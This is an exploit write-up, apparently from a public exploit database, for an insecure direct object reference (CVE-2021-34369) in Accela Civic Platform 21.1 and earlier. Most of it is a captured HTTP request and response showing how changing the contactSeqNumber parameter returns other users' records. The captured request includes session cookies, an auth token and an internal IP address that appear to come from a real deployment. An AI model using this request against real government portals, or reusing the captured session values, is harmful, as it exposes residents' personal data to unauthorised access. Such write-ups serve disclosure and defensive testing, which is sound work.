# Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR) # Software Link: https://www.accela.com/civic-platform/ # Version: <= 21.1 # Author: Abdulazeez Alaseeri # Tested on: JBoss server/windows # Type: Web App # Date: 07/06/2021 # CVE: CVE-2021-34369 ================================================================ Accela Civic Platform Insecure Direct Object References <= 21.1 ================================================================ This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber ================================================================ Request Heeaders start ================================================================ GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1 Host: Hidden Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ================================================================ Request Heeaders end ================================================================ ================================================================ Response Heeaders start ================================================================ HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache X-Powered-By: JSP/2.3 Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure X-XSS-Protection: 0 Pragma: No-cache X-UA-Compatible: IE=EDGE Date: Wed, 09 Jun 2021 04:09:40 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 98126 ================================================================ Response Heeaders end ================================================================ contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR